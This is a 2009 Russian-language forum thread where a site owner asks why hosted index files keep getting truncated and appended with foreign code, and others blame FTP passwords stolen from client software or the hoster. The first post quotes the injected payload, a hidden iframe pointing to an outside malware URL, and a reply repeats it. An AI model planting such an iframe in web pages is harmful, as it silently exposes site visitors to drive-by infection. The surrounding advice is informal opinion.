Вопрос по сайту на хостинге

← →
SP (2009-07-08 11:34) [0]

Периодически на сайте меняются файлы... В основном index.htm, index.php и т.п. Какая-то зараза дописывает что-то в конец файла... причем некоторые файлы она перед этим обрезает...
Например получается вот такая концовка:

... exit(); } else { $xoopsOption["show_cblock"] =1; include "x2/head <iframe src="http://a3q.ru:8080/ts/in.cgi?pepsi87" width=125 height=125 style="visibility: hidden"></iframe>

Что это за фигня такая и кто в этом виноват?
В смысле это я где-то что пропустил и оставил дыру, или это вина хостера.
Это что-то уникальное или кто-нить с такой проблемой уже сталкивался?
хостинг: xp-hosting.com

← →
SP (2009-07-08 11:37) [1]

Кстати iframe это первый раз появилось. раньше в индексную страничку добавлялось нечто такое, что могло заразить комп при открытии сайта например в IE (что там было точно не помню, так как не сохранил его), просто приходилось часто заходить по фтп и вычищать эту гадость

← →
Anatoly Podgoretsky © (2009-07-08 12:04) [2]

> SP (08.07.2009 11:34:00) [0]

Это зараза вирус

← →
brother © (2009-07-08 13:17) [3]

это вирус 100% все претензии к:
> <iframe src="http://a3q.ru:8080/ts/in.cgi?pepsi87" width=125
> height=125 style="visibility: hidden"></iframe>

)))

← →
brother © (2009-07-08 13:22) [4]

ИМХО, это вина хостера, хотя не факт! Еслиб был хак только тебя - то такой мешанины бы не вставили....

← →
antonn © (2009-07-08 14:29) [5]

> SP (08.07.09 11:34)

смени все пароли на ФТП и некоторое время не ходи через него. Если повторится - виноват хостер. Была у меня аналогичная хрень, хостера вообще сменил и прекратилось

← →
TIF © (2009-07-08 15:35) [6]

Аналогично. Недавно гугл прислал письмо, что у меня вирус на сайте. написла письмо хостеру. Сказали, что читайте FAQ и закрыли моё обращение на странице техподдержки, без возмодности ответить.

В FAQ речь про то, что пароль похитили из моего FTP-клиента, но я не верю - не мог касперский (KIS 2010) с последними базами пропустить что-то подобное ко мне... Ну разве что вирус уж совсем новый o_O Но вероятность - 1%

Проклинаю хостера и держу обиду в себе. Пароль не менял

← →
TIF © (2009-07-08 15:36) [7]

*извините за опечатки. Это я от гнева )))

← →
antonn © (2009-07-08 15:37) [8]

пароль в FTP передается открытым текстом :)

← →
Урсулапов_ (2009-07-08 18:37) [9]

У меня было такое, и здесь на форуме писал, спрашивал. Оказалось, что из-за того, что пароль от ФТП хранился у меня на ФТП-клиенте. Поменял пароли на ФТП, запомнил у себя в голове и счастлив. :))

← →
Урсулапов_ (2009-07-08 18:39) [10]

> Поменял пароли на ФТП

И после того, как перестал хранить пароль на клиенте, такие изменения файлов index.php /index.html не наблюдаются.

← →
SP (2009-07-09 10:36) [11]

> Урсулапов_ (08.07.09 18:39) [10]
>
>
> > Поменял пароли на ФТП
>
> И после того, как перестал хранить пароль на клиенте, такие
> изменения файлов index.php /index.html не наблюдаются.

Хм... Что-то не задумывался о том, что такое может быть ...
проверю...

← →
KilkennyCat © (2009-07-10 06:36) [12]

> не мог касперский

ну-ну. еще как может. Касперский может все. Вот только как антивирус полное говно.

← →
brother © (2009-07-10 06:43) [13]

эээ, вообще-то любой антивирус может пропустить *PARDON*

← →
TIF © (2009-07-10 08:09) [14]

> Вот только как антивирус полное говно.

Это говно у меня за шесть лет никакой гадости не пропустило :-P

Не считая моментов, когда я сам по доброте душевной (и ради любопытства тоже) разрешал порезвиться в системных файлах всяким троянам ) Правда даже после таких извращений всю-всю гадость выметал/лечил веник-каспер

Единственные мелкие сюрпризы - это единственный ложный детект Delphi-программки + вот это заражение сайта, которое правда-таки под вопросом (каспер ли не задетектировал ещё неизвестную гадость, которая стянула пароль, или FileZilla сама выслала плохим людям мой пароль... :), но 6 лет и 20 потраченных на исправление "сюрпризов" минут - это небо и земля

Так что пусть каждый сам выберет себе антивирь, на вкус и цвет товарищей нет (+ ещё мало установить, надо ещё суметь оптимально и правильно настроить...)

PS: теперь и Яндекс запустил систему отслеживания сайтов с вирусами, закрывает их заглушками в результатах поиска, как и гугл + в панели вебмастера можно проверить, какие страницы заражены. Вот это хорошая новость, молодцы

← →
Anatoly Podgoretsky © (2009-07-10 10:56) [15]

> Касперский может все. Вот только как антивирус полное говно.

Касперский хороший антивирус, если только им не лечить.

← →
KSergey © (2009-07-10 12:58) [16]

Люди, скажите: из FAR"а тоже воруют?

← →
TIF © (2009-07-10 13:08) [17]

> Люди, скажите: из FAR"а тоже воруют?

ДА
(сам не пользовался, но был свидетелем заражения главной страницы сайта на narod-е, а для обновления сайта использовался FAR...)

← →
KSergey © (2009-07-10 13:19) [18]

как жить!

← →
TIF © (2009-07-10 13:48) [19]

Надо свой FTP-клиент написать = )

> TIF © (10.07.09 08:09) [14]
> Это говно у меня за шесть лет никакой гадости не пропустило
> :-P

Блаженны верующие...
Собственно, я не агитирую. Я не произвожу антивирусов, и касперский мне не конкурент.
Нравится - пользуйся.
Но есть нюанс ;)

> Но есть нюанс ;)

А где их нет? )

> [0] SP (08.07.09 11:34)

виноват локальный вирус, который ворует пароли у тотал-коммандера. лечите вирусы, удаляейте тотал коммандеры.

← →
Как обычно (2009-07-11 16:22) [23]

> удаляейте тотал коммандеры.

> Люди, скажите: из FAR"а тоже воруют?

Как всегда, виноваты все вокруг, кроме себя самого - любимого.

У меня такое уже раза три было. Пользуюсь фаром, пароли всегда в голове. Последний раз, файлы были отредактированы когда вообще моя машина была выключена. Хостер сказал что мол это не показатель, какая-то бяка перехватывает мои пароли при обращении, а потом использует. Но есть одно но: у меня у вышеупомянутого хостера два аккаунта и на обоих в одно время произошло это. Хотя второй аккаунт, довольно давно не юзал. Вообщем, мне кажется сами хостеры ловят какую-то хрень, но фиг признаются. Радикальный выход - это вообще отказаться от FTP и переходить на использование SSH

> Вообщем, мне кажется сами хостеры ловят какую-то хрень,
> но фиг признаются.

Ура :) Спасибо за информацию, теперь есть хоть какие-то факты в пользу моих подозрений (да и не только моих)

← →
SP (2009-07-13 17:26) [26]

Кстати, кроме сохраненных логина/пароля от фтп хостинга у меня еще и в клиенте были сохраненные логины/пароли от локальных ФТП. Но на них ничего подозрительного вроде не происходило никогда.
Вирусы проверяют IP адреса на серость?

← →
Styx_ (2009-07-13 17:29) [27]

> Вирусы проверяют IP адреса на серость?

"Серый" - он потому и серый, что из интернета на него не зайдёшь.

Вопрос по сайту на хостинге Найти похожие ветки